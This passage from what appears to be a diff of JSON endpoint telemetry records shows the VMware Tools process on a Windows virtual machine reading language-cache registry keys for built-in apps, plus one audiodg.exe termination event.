Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c95cbb64f\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570925280000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570925590000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d36ffbc8b\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d36ffbc8b\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570925590000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570926369984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d33b3b668\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d33b3b668\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570926369984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570926990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5c90e59d93\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5c90e59d93\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570926990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "process", + "pid": 5812, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "subtype": "terminate", + "timestamp": 131883570927150000, + "unique_pid": "{42FC7E13-C9B7-5C05-0000-0010A6AC4901}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570927780000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri\\1d488aa1fd4cc8a\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri\\1d488aa1fd4cc8a\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570927780000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570928250000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d9e6833ee\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d9e6833ee\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570928250000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri", + "timestamp": 131883570929650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5da4bfd463\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5da4bfd463\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570929650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570930440000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d7fbd180a\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d7fbd180a\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570930440000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570930740000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri\\1d488a96e81c592\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri\\1d488a96e81c592\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570930740000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570931990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9db3639b\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9db3639b\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570931990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570932460000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97568a9e\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97568a9e\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570932460000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570933550000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri\\1d488aa16ad201f\\5ca31589", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri\\1d488aa16ad201f\\5ca31589\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570933550000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570934020000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri\\1d488aa1d17d17e\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.HolographicFirstRun_cw5n1h2txyewy%5Cresources.pri\\1d488aa1d17d17e\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570934020000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570934490000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c2e6bbc\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c2e6bbc\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570934490000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570934960000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c54e27f\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9c54e27f\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570934960000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570935430000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\\1d3d1edaaf6ead6\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\\1d3d1edaaf6ead6\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570935430000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883570936360000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cfa173475\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2018.18091.17210.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5cfa173475\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570936360000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570936990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri\\1d488a9be905cd0\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecHealthUI_cw5n1h2txyewy%5Cresources.pri\\1d488a9be905cd0\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570936990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": 